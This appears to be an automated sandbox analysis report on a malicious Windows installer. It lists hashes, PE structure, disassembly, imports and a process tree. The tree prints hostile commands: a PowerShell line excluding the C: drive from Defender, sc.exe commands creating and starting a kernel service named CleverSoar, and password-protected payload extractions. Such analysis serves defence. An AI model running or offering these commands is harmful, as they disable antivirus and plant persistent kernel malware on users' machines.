                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):406
                                        Entropy (8bit):5.117520345541057
                                        Encrypted:false
                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                        MD5:9200058492BCA8F9D88B4877F842C148
                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                        Malicious:false
                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.921265219134115
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                        • Inno Setup installer (109748/4) 1.08%
                                        • InstallShield setup (43055/19) 0.42%
                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                        File name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File size:5'707'508 bytes
                                        MD5:8d24ff51c87bc901cb4c88cb885dc15a
                                        SHA1:c8f7e17799b8ad0769f83b2d7d8f491384aa93d0
                                        SHA256:52ae54a6103be491559249ed1ed982b69b06948849a880db142eb37ff0484a3b
                                        SHA512:dbee19d7f7716dbcd5b4c63c90c63526c6f183038e84cb303c2f46587a7be1d164d186e799cb42280981ab1a917575aac982dc0eaab186dea329cc85bf43543e
                                        SSDEEP:98304:XwRES3ZFYl6Qc9lJkMtCI4ZZEoqW2cb/k913pDdMwZgf:lUo6jbtF4Z12cbchs
                                        TLSH:D5461223F2CBE53DE05E0B3B15B2A15894FB6A216522AD52C6ECB4ECCF351601D3E647
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                        Icon Hash:0c0c2d33ceec80aa
                                        Entrypoint:0x4a83bc
                                        Entrypoint Section:.itext
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:1
                                        File Version Major:6
                                        File Version Minor:1
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:1
                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFA4h
                                        push ebx
                                        push esi
                                        push edi
                                        xor eax, eax
                                        mov dword ptr [ebp-3Ch], eax
                                        mov dword ptr [ebp-40h], eax
                                        mov dword ptr [ebp-5Ch], eax
                                        mov dword ptr [ebp-30h], eax
                                        mov dword ptr [ebp-38h], eax
                                        mov dword ptr [ebp-34h], eax
                                        mov dword ptr [ebp-2Ch], eax
                                        mov dword ptr [ebp-28h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov eax, 004A2EBCh
                                        call 00007F3980734835h
                                        xor eax, eax
                                        push ebp
                                        push 004A8AC1h
                                        push dword ptr fs:[eax]
                                        mov dword ptr fs:[eax], esp
                                        xor edx, edx
                                        push ebp
                                        push 004A8A7Bh
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        mov eax, dword ptr [004B0634h]
                                        call 00007F39807C61BBh
                                        call 00007F39807C5D0Eh
                                        lea edx, dword ptr [ebp-14h]
                                        xor eax, eax
                                        call 00007F39807C09E8h
                                        mov edx, dword ptr [ebp-14h]
                                        mov eax, 004B41F4h
                                        call 00007F398072E8E3h
                                        push 00000002h
                                        push 00000000h
                                        push 00000001h
                                        mov ecx, dword ptr [004B41F4h]
                                        mov dl, 01h
                                        mov eax, dword ptr [0049CD14h]
                                        call 00007F39807C1D13h
                                        mov dword ptr [004B41F8h], eax
                                        xor edx, edx
                                        push ebp
                                        push 004A8A27h
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        call 00007F39807C6243h
                                        mov dword ptr [004B4200h], eax
                                        mov eax, dword ptr [004B4200h]
                                        cmp dword ptr [eax+0Ch], 01h
                                        jne 00007F39807CCF2Ah
                                        mov eax, dword ptr [004B4200h]
                                        mov edx, 00000028h
                                        call 00007F39807C2608h
                                        mov edx, dword ptr [004B4200h]
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc0xcb0000x110000x11000c77c993913ee57d416c0b87d169b66ebFalse0.18785903033088236data3.721257000596691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                        RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                        RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                        RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                        RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                        RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                        RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                        RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                        RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                        RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                        RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                        RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                        RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                        RT_STRING0xd8e000x3f8data0.3198818897637795
                                        RT_STRING0xd91f80x2dcdata0.36475409836065575
                                        RT_STRING0xd94d40x430data0.40578358208955223
                                        RT_STRING0xd99040x44cdata0.38636363636363635
                                        RT_STRING0xd9d500x2d4data0.39226519337016574
                                        RT_STRING0xda0240xb8data0.6467391304347826
                                        RT_STRING0xda0dc0x9cdata0.6410256410256411
                                        RT_STRING0xda1780x374data0.4230769230769231
                                        RT_STRING0xda4ec0x398data0.3358695652173913
                                        RT_STRING0xda8840x368data0.3795871559633027
                                        RT_STRING0xdabec0x2a4data0.4275147928994083
                                        RT_RCDATA0xdae900x10data1.5
                                        RT_RCDATA0xdaea00x310data0.6173469387755102
                                        RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                        RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                        RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                        RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                        DLLImport
                                        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                        comctl32.dllInitCommonControls
                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                        NameOrdinalAddress
                                        __dbk_fcall_wrapper20x40fc10
                                        dbkFCallWrapperAddr10x4b063c
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        No network behavior found

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:03:24:08
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                                        Imagebase:0xde0000
                                        File size:5'707'508 bytes
                                        MD5 hash:8D24FF51C87BC901CB4C88CB885DC15A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                                        Imagebase:0x490000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:24:10
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                                        Imagebase:0xde0000
                                        File size:5'707'508 bytes
                                        MD5 hash:8D24FF51C87BC901CB4C88CB885DC15A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:false

                                        Target ID:6
                                        Start time:03:24:11
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                                        Imagebase:0xb30000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                        Imagebase:0xe90000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:03:24:14
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                        Imagebase:0xe90000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:03:24:14
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff717f30000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:18
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
